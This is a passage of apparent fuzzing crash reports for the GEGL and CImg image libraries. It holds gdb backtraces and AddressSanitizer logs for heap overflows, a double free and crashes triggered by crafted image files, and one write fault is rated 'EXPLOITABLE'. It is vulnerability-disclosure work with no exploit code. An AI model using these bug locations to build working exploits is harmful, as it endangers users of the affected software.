../../../gegl/gegl/graph/gegl-node.c:1827 127 | #13 0x00000000004039ea in main (argc=, argv=) 128 | at ../../gegl/bin/gegl.c:255 129 | ``` 130 | 131 | ## 4. gegl-outbound-write-2 132 | 133 | ``` 134 | $ gdb --args gegl $POC 135 | [Thread debugging using libthread_db enabled] 136 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 137 | 138 | (gegl:201): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 139 | 140 | (gegl:201): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 141 | LIBPNG ERROR: PNG unsigned integer out of range.libpng error: PNG unsigned integer out of range. 142 | LIBPNG ERROR: PNG unsigned integer out of range.libpng error: PNG unsigned integer out of range. 143 | 144 | ** (gegl:201): WARNING **: No display handler operation found for gegl:display 145 | LIBPNG ERROR: PNG unsigned integer out of range.libpng error: PNG unsigned integer out of range. 146 | [New Thread 0x7fffef432700 (LWP 202)] 147 | 148 | Thread 1 "gegl" received signal SIGSEGV, Segmentation fault. 149 | babl_format_get_bytes_per_pixel (format=0x824871a0) at babl-format.c:538 150 | 538 if (format->class_type == BABL_FORMAT) 151 | $ bt 152 | #0 babl_format_get_bytes_per_pixel (format=0x824871a0) at babl-format.c:538 153 | #1 0x00007ffff7b06ad5 in constructed (object=) at ../../../gegl/gegl/buffer/gegl-tile-backend.c:128 154 | #2 0x00007ffff7b0f37b in gegl_tile_backend_swap_constructed (object=0x7355c0) at ../../../gegl/gegl/buffer/gegl-tile-backend-swap.c:825 155 | #3 0x00007ffff77b1897 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 156 | #4 0x00007ffff77b31b5 in g_object_new_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 157 | #5 0x00007ffff77b3521 in g_object_new () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 158 | #6 0x00007ffff7a819a1 in gegl_buffer_constructor (type=, n_params=16, params=) at ../../../gegl/gegl/buffer/gegl-buffer.c:578 159 | #7 0x00007ffff77b1149 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 160 | #8 0x00007ffff77b31b5 in g_object_new_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 161 | #9 0x00007ffff77b3521 in g_object_new () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 162 | #10 0x00007ffff7b5114f in gegl_node_get_cache (node=) at ../../../gegl/gegl/graph/gegl-node.c:2015 163 | #11 0x00007ffff7b6e471 in gegl_processor_set_rectangle (processor=0x735460, rectangle=) at ../../../gegl/gegl/process/gegl-processor.c:366 164 | #12 0x00007ffff77b170d in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 165 | #13 0x00007ffff77b31b5 in g_object_new_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 166 | #14 0x00007ffff77b3521 in g_object_new () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 167 | #15 0x00007ffff7b732dc in gegl_node_new_processor (node=, rectangle=) at ../../../gegl/gegl/process/gegl-processor.c:829 168 | #16 0x00007ffff7b50a4a in gegl_node_process (self=0x6962c0) at ../../../gegl/gegl/graph/gegl-node.c:1825 169 | #17 0x00000000004039ea in main (argc=, argv=) at ../../gegl/bin/gegl.c:255 170 | Description: Access violation on destination operand 171 | Short description: DestAv (8/22) 172 | Hash: 2de8b3adb00a42a787c6c00f820ea8be.4b5b031fbd08ebbe2eb2f77fcda9adc2 173 | Exploitability Classification: EXPLOITABLE 174 | Explanation: The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value. 175 | Other tags: AccessViolation (21/22) 176 | 177 | ``` 178 | 179 | ## 5. gegl-dos-3 180 | 181 | ``` 182 | Starting program: /src/aflbuild/installed/bin/gegl /work/crashes/'gegl000:id:000000,sig:11,src:000069,op:havoc,rep:2' 183 | [Thread debugging using libthread_db enabled] 184 | Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". 185 | 186 | (gegl:155): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 187 | 188 | (gegl:155): GEGL-WARNING **: Failed to set operation type gegl:text, using a passthrough op instead 189 | 190 | Program received signal SIGSEGV, Segmentation fault. 191 | 0x00007ffff091bb94 in ?? () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 192 | (gdb) bt 193 | #0 0x00007ffff091bb94 in ?? () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 194 | #1 0x00007ffff091c4df in ?? () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 195 | #2 0x00007ffff091a8ed in ?? () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 196 | #3 0x00007ffff0913bc7 in jpeg_consume_input () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 197 | #4 0x00007ffff0913ea3 in jpeg_read_header () from /usr/lib/x86_64-linux-gnu/libjpeg.so.8 198 | #5 0x00007fffef63d223 in gegl_jpg_load_query_jpg (stream=stream@entry=0x748890, width=width@entry=0x7fffffffd670, height=height@entry=0x7fffffffd674, out_format=out_format@entry=0x7fffffffd678) 199 | at ../../../gegl/operations/external/jpg-load.c:188 200 | #6 0x00007fffef63d7f4 in gegl_jpg_load_get_bounding_box (operation=operation@entry=0x6cc260) at ../../../gegl/operations/external/jpg-load.c:302 201 | #7 0x00007ffff7b244f6 in gegl_operation_get_bounding_box (self=self@entry=0x6cc260) at ../../../gegl/gegl/operation/gegl-operation.c:197 202 | #8 0x00007ffff7b6909f in gegl_graph_prepare (path=0x73c880) at ../../../gegl/gegl/process/gegl-graph-traversal.c:191 203 | #9 0x00007ffff7b67955 in gegl_eval_manager_prepare (self=0x740080) at ../../../gegl/gegl/process/gegl-eval-manager.c:93 204 | #10 0x00007ffff7b67a01 in gegl_eval_manager_get_bounding_box (self=self@entry=0x740080) at ../../../gegl/gegl/process/gegl-eval-manager.c:102 205 | #11 0x00007ffff7b50357 in gegl_node_get_bounding_box (self=self@entry=0x696530) at ../../../gegl/gegl/graph/gegl-node.c:1810 206 | #12 0x00007ffff7b52851 in gegl_node_property_changed (gobject=, arg1=0x727360, user_data=0x696530) at ../../../gegl/gegl/graph/gegl-node.c:1352 207 | #13 0x00007ffff77abfa5 in g_closure_invoke () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 208 | #14 0x00007ffff77bdfc1 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 209 | #15 0x00007ffff77c6d5c in g_signal_emit_valist () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 210 | #16 0x00007ffff77c708f in g_signal_emit () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 211 | #17 0x00007ffff77b04d4 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 212 | #18 0x00007ffff77afd88 in ?? () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 213 | #19 0x00007ffff77b2b0b in g_object_thaw_notify () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 214 | #20 0x00007ffff7b5b206 in gegl_node_set_valist (self=self@entry=0x696530, first_property_name=, first_property_name@entry=0x7ffff20e505d "path", var_args=var_args@entry=0x7fffffffde20) 215 | at ../../../gegl/gegl/graph/gegl-node.c:1546 216 | #21 0x00007ffff7b5bc04 in gegl_node_set (self=0x696530, first_property_name=first_property_name@entry=0x7ffff20e505d "path") at ../../../gegl/gegl/graph/gegl-node.c:1442 217 | #22 0x00007ffff20d6e35 in do_setup (operation=operation@entry=0x64c500, path=0x73ba20 "/work/crashes/gegl000:id:000000,sig:11,src:000069,op:havoc,rep:2", uri=0x739770 "") 218 | at ../../../gegl/operations/core/load.c:262 219 | #23 0x00007ffff20d7fac in my_set_property (gobject=, property_id=1, value=0x7fffffffe000, pspec=0x7351b0) at ../../../gegl/operations/core/load.c:345 220 | #24 0x00007ffff77b42eb in g_object_set_property () from /usr/lib/x86_64-linux-gnu/libgobject-2.0.so.0 221 | #25 0x00007ffff7b5b0cc in gegl_node_set_valist (self=self@entry=0x696390, first_property_name=, first_property_name@entry=0x73cce0 "path", var_args=var_args@entry=0x7fffffffe120) 222 | at ../../../gegl/gegl/graph/gegl-node.c:1537 223 | #26 0x00007ffff7b5bc04 in gegl_node_set (self=self@entry=0x696390, first_property_name=first_property_name@entry=0x73cce0 "path") at ../../../gegl/gegl/graph/gegl-node.c:1442 224 | #27 0x00007ffff7a6377e in param_set (pd=, new=0x696390, param_name=, param_value=0x73cc90 "gegl000:id:000000,sig:11,src:000069,op:havoc,rep:2") at ../../gegl/gegl/gegl-xml.c:145 225 | #28 0x00007ffff7a65fa7 in start_element (context=, element_name=, attribute_names=, attribute_values=, user_data=0x7fffffffe3e0, 226 | error=0x7fffffffe300) at ../../gegl/gegl/gegl-xml.c:420 227 | #29 0x00007ffff74d85a3 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 228 | #30 0x00007ffff74d9763 in g_markup_parse_context_parse () from /lib/x86_64-linux-gnu/libglib-2.0.so.0 229 | #31 0x00007ffff7a6f744 in gegl_node_new_from_xml (xmldata=0x684a20 "", path_root=path_root@entry=0x64ad80 "/work/crashes") 230 | at ../../gegl/gegl/gegl-xml.c:576 231 | #32 0x0000000000403060 in main (argc=, argv=) at ../../gegl/bin/gegl.c:216 232 | ``` 233 | 234 | 235 | -------------------------------------------------------------------------------- /cimg/readme.md: -------------------------------------------------------------------------------- 1 | cimg crashes 2 | ================ 3 | 4 | code: 5 | http://cimg.eu/ 6 | https://github.com/dtschump/CImg 7 | 8 | ## 1. cimg-heap-overflow-1 9 | 10 | $cimgload cimg-heap-overflow-1 11 | 12 | ``` 13 | ================================================================= 14 | ==6193==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f91792ff800 at pc 0x00000049dd13 bp 0x7ffee7a8e890 sp 0x7ffee7a8e880 15 | READ of size 1 at 0x7f91792ff800 thread T0 16 | #0 0x49dd12 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48457 17 | #1 0x4b84a4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 18 | #2 0x4b84a4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 19 | #3 0x4022fa in cimg_library::CImg::assign(char const*) ../CImg.h:11514 20 | #4 0x4022fa in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 21 | #5 0x4022fa in main /src/CImg/fuzz-test/bmp-test.cpp:25 22 | #6 0x7f917bb8f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 23 | 24 | 0x7f91792ff800 is located 0 bytes to the right of 6287360-byte region [0x7f9178d00800,0x7f91792ff800) 25 | allocated by thread T0 here: 26 | #0 0x7f917ca906b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 27 | #1 0x433fb6 in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 28 | #2 0x49a75d in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int, unsigned char const&) ../CImg.h:11399 29 | #3 0x49a75d in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48348 30 | #4 0x4b84a4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 31 | #5 0x4b84a4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 32 | #6 0x4022fa in cimg_library::CImg::assign(char const*) ../CImg.h:11514 33 | #7 0x4022fa in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 34 | #8 0x4022fa in main /src/CImg/fuzz-test/bmp-test.cpp:25 35 | 36 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48457 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 37 | Shadow bytes around the buggy address: 38 | 0x0ff2af257eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 | 0x0ff2af257ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 | 0x0ff2af257ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 | 0x0ff2af257ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 | 0x0ff2af257ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 | =>0x0ff2af257f00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 44 | 0x0ff2af257f10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 45 | 0x0ff2af257f20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 46 | 0x0ff2af257f30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 47 | 0x0ff2af257f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 48 | 0x0ff2af257f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 49 | Shadow byte legend (one shadow byte represents 8 application bytes): 50 | Addressable: 00 51 | Partially addressable: 01 02 03 04 05 06 07 52 | Heap left redzone: fa 53 | Heap right redzone: fb 54 | Freed heap region: fd 55 | Stack left redzone: f1 56 | Stack mid redzone: f2 57 | Stack right redzone: f3 58 | Stack partial redzone: f4 59 | Stack after return: f5 60 | Stack use after scope: f8 61 | Global redzone: f9 62 | Global init order: f6 63 | Poisoned by user: f7 64 | Container overflow: fc 65 | Array cookie: ac 66 | Intra object redzone: bb 67 | ASan internal: fe 68 | ==6193==ABORTING 69 | ``` 70 | 71 | 72 | ## 2. cimg-double-free-1 73 | 74 | ``` 75 | ================================================================= 76 | ==6191==ERROR: AddressSanitizer: attempting double-free on 0x62100001a500 in thread T0: 77 | #0 0x7f1be4f702ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) 78 | #1 0x7f1be40cbc55 in _IO_default_finish (/lib/x86_64-linux-gnu/libc.so.6+0x7bc55) 79 | #2 0x7f1be40bd29e in fclose (/lib/x86_64-linux-gnu/libc.so.6+0x6d29e) 80 | #3 0x7f1be4f6f7cd in fclose (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x977cd) 81 | #4 0x40a518 in cimg_library::cimg::fclose(_IO_FILE*) ../CImg.h:6187 82 | #5 0x49b051 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48467 83 | #6 0x4b84a4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 84 | #7 0x4b84a4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 85 | #8 0x4022fa in cimg_library::CImg::assign(char const*) ../CImg.h:11514 86 | #9 0x4022fa in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 87 | #10 0x4022fa in main /src/CImg/fuzz-test/bmp-test.cpp:25 88 | #11 0x7f1be407082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 89 | 90 | 0x62100001a500 is located 0 bytes inside of 4096-byte region [0x62100001a500,0x62100001b500) 91 | freed by thread T0 here: 92 | #0 0x7f1be4f702ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) 93 | #1 0x7f1be40cbe3c in _IO_default_finish (/lib/x86_64-linux-gnu/libc.so.6+0x7be3c) 94 | 95 | previously allocated by thread T0 here: 96 | #0 0x7f1be4f70602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) 97 | #1 0x7f1be40bd1d4 in _IO_file_doallocate (/lib/x86_64-linux-gnu/libc.so.6+0x6d1d4) 98 | 99 | SUMMARY: AddressSanitizer: double-free ??:0 __interceptor_free 100 | ==6191==ABORTING 101 | 102 | 103 | ``` 104 | 105 | ## 3. cimg-crash-1 106 | 107 | segmentfault for allocate failed. 108 | 109 | ``` 110 | ==6194==WARNING: AddressSanitizer failed to allocate 0x001800000c00 bytes 111 | ==6194==AddressSanitizer's allocator is terminating the process instead of returning 0 112 | ==6194==If you don't like this behavior set allocator_may_return_null=1 113 | ==6194==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0) 114 | #0 0x7f88deb49631 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa0631) 115 | #1 0x7f88deb4e5e3 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa55e3) 116 | #2 0x7f88deac6425 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x1d425) 117 | #3 0x7f88deb4c865 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xa3865) 118 | #4 0x7f88deacbb4d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22b4d) 119 | #5 0x7f88deb4267e in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9967e) 120 | #6 0x433fb6 in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 121 | #7 0x49a9d5 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48366 122 | #8 0x4b84a4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 123 | #9 0x4b84a4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 124 | #10 0x4022fa in cimg_library::CImg::assign(char const*) ../CImg.h:11514 125 | #11 0x4022fa in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 126 | #12 0x4022fa in main /src/CImg/fuzz-test/bmp-test.cpp:25 127 | #13 0x7f88ddc4182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 128 | 129 | 130 | ``` 131 | 132 | ## 4. cimg-load_bmp-dos-1 133 | 134 | Loading the crafted bmp file by cimg.h will lead to cpu exhaust. 135 | 136 | 137 | ## 5. cimg-heap-overflow-load_bmp-48397 138 | 139 | A heap overflow occurs in line 48397 in CImg.h when loading the crafted bmp file . 140 | the tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 141 | 142 | ``` 143 | ================================================================= 144 | ==4030==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000ef9c at pc 0x000000494724 bp 0x7ffc58d04270 sp 0x7ffc58d04260 145 | READ of size 1 at 0x60600000ef9c thread T0 146 | #0 0x494723 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48397 147 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 148 | #2 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 149 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 150 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 151 | #5 0x40215f injjj main /src/CImg/fuzz-test/bmp-test.cpp:25 152 | #6 0x7ff32e56282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 153 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 154 | 155 | 0x60600000ef9c is located 0 bytes to the right of 60-byte region [0x60600000ef60,0x60600000ef9c) 156 | allocated by thread T0 here: 157 | #0 0x7ff32f15a6b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 158 | #1 0x40562f in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 159 | #2 0x4907f4 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48342 160 | #3 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 161 | #4 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 162 | #5 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 163 | #6 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 164 | #7 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 165 | 166 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48397 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 167 | Shadow bytes around the buggy address: 168 | 0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 169 | 0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 170 | 0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 171 | 0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 172 | 0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 173 | =>0x0c0c7fff9df0: 00 00 00[04]fa fa fa fa 00 00 00 00 00 00 06 fa 174 | 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 175 | 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 176 | 0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 177 | 0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 178 | 0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 179 | Shadow byte legend (one shadow byte represents 8 application bytes): 180 | Addressable: 00 181 | Partially addressable: 01 02 03 04 05 06 07 182 | Heap left redzone: fa 183 | Heap right redzone: fb 184 | Freed heap region: fd 185 | Stack left redzone: f1 186 | Stack mid redzone: f2 187 | Stack right redzone: f3 188 | Stack partial redzone: f4 189 | Stack after return: f5 190 | Stack use after scope: f8 191 | Global redzone: f9 192 | Global init order: f6 193 | Poisoned by user: f7 194 | Container overflow: fc 195 | Array cookie: ac 196 | Intra object redzone: bb 197 | ASan internal: fe 198 | ==4030==ABORTING 199 | 200 | ``` 201 | 202 | ## 6. cimg-heap-overflow-load_bmp-48413 203 | 204 | A heap overflow occurs in line 48413 in CImg.h when loading the crafted bmp file . 205 | the tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 206 | 207 | ``` 208 | ================================================================= 209 | ==4037==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000f034 at pc 0x000000493848 bp 0x7ffd46b9bc90 sp 0x7ffd46b9bc80 210 | READ of size 1 at 0x60200000f034 thread T0 211 | #0 0x493847 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48413 212 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 213 | #2 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 214 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 215 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 216 | #5 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 217 | #6 0x7f0ca927b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 218 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 219 | 220 | AddressSanitizer can not describe address in more detail (wild memory access suspected). 221 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48413 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 222 | Shadow bytes around the buggy address: 223 | 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 224 | 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 225 | 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 226 | 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 227 | 0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa 00 fa fa fa 00 00 228 | =>0x0c047fff9e00: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa 229 | 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 230 | 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 231 | 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 232 | 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 233 | 0x0c047fff9e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 234 | Shadow byte legend (one shadow byte represents 8 application bytes): 235 | Addressable: 00 236 | Partially addressable: 01 02 03 04 05 06 07 237 | Heap left redzone: fa 238 | Heap right redzone: fb 239 | Freed heap region: fd 240 | Stack left redzone: f1 241 | Stack mid redzone: f2 242 | Stack right redzone: f3 243 | Stack partial redzone: f4 244 | Stack after return: f5 245 | Stack use after scope: f8 246 | Global redzone: f9 247 | Global init order: f6 248 | Poisoned by user: f7 249 | Container overflow: fc 250 | Array cookie: ac 251 | Intra object redzone: bb 252 | ASan internal: fe 253 | ==4037==ABORTING 254 | 255 | 256 | ``` 257 | 258 | ## 6. cimg-heap-overflow-load_bmp-48457 259 | 260 | A heap overflow occurs in line 48457 in CImg.h when loading the crafted bmp file . 261 | the tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 262 | ``` 263 | ================================================================= 264 | ==4040==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62600000ed3c at pc 0x0000004941b2 bp 0x7ffe59105df0 sp 0x7ffe59105de0 265 | READ of size 1 at 0x62600000ed3c thread T0 266 | #0 0x4941b1 in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48457 267 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 268 | #2 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 269 | #3 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 270 | #4 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 271 | #5 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 272 | #6 0x7f3fdcc1982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) 273 | #7 0x4022f8 in _start (/src/CImg/fuzz-test/bmp-test+0x4022f8) 274 | 275 | 0x62600000ed3c is located 0 bytes to the right of 11324-byte region [0x62600000c100,0x62600000ed3c) 276 | allocated by thread T0 here: 277 | #0 0x7f3fdd8116b2 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x996b2) 278 | #1 0x4074fe in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int) ../CImg.h:11379 279 | #2 0x49090a in cimg_library::CImg::assign(unsigned int, unsigned int, unsigned int, unsigned int, unsigned char const&) ../CImg.h:11399 280 | #3 0x49090a in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48348 281 | #4 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 282 | #5 0x4addc4 in cimg_library::CImg::load(char const*) ../CImg.h:48122 283 | #6 0x40215f in cimg_library::CImg::assign(char const*) ../CImg.h:11514 284 | #7 0x40215f in cimg_library::CImg::CImg(char const*) ../CImg.h:11161 285 | #8 0x40215f in main /src/CImg/fuzz-test/bmp-test.cpp:25 286 | 287 | SUMMARY: AddressSanitizer: heap-buffer-overflow ../CImg.h:48457 cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) 288 | Shadow bytes around the buggy address: 289 | 0x0c4c7fff9d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 290 | 0x0c4c7fff9d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 291 | 0x0c4c7fff9d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 292 | 0x0c4c7fff9d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 293 | 0x0c4c7fff9d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 294 | =>0x0c4c7fff9da0: 00 00 00 00 00 00 00[04]fa fa fa fa fa fa fa fa 295 | 0x0c4c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 296 | 0x0c4c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 297 | 0x0c4c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 298 | 0x0c4c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 299 | 0x0c4c7fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 300 | Shadow byte legend (one shadow byte represents 8 application bytes): 301 | Addressable: 00 302 | Partially addressable: 01 02 03 04 05 06 07 303 | Heap left redzone: fa 304 | Heap right redzone: fb 305 | Freed heap region: fd 306 | Stack left redzone: f1 307 | Stack mid redzone: f2 308 | Stack right redzone: f3 309 | Stack partial redzone: f4 310 | Stack after return: f5 311 | Stack use after scope: f8 312 | Global redzone: f9 313 | Global init order: f6 314 | Poisoned by user: f7 315 | Container overflow: fc 316 | Array cookie: ac 317 | Intra object redzone: bb 318 | ASan internal: fe 319 | ==4040==ABORTING 320 | 321 | ``` 322 | 323 | ## 7. cimg-heap-overflow-load_bmp-48427 324 | 325 | A heap overflow occurs in line 48427 in CImg.h when loading the crafted bmp file . 326 | the tested code commit is 8447076ef22322a14a0ce130837e44c5ba8095f4. 327 | 328 | ``` 329 | ================================================================= 330 | ==4043==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eff8 at pc 0x00000049418f bp 0x7ffeb2a68590 sp 0x7ffeb2a68580 331 | READ of size 1 at 0x60200000eff8 thread T0 332 | #0 0x49418e in cimg_library::CImg::_load_bmp(_IO_FILE*, char const*) ../CImg.h:48427 333 | #1 0x4addc4 in cimg_library::CImg::load_bmp(char const*) ../CImg.h:48280 334 | #2 0x4addc4 in 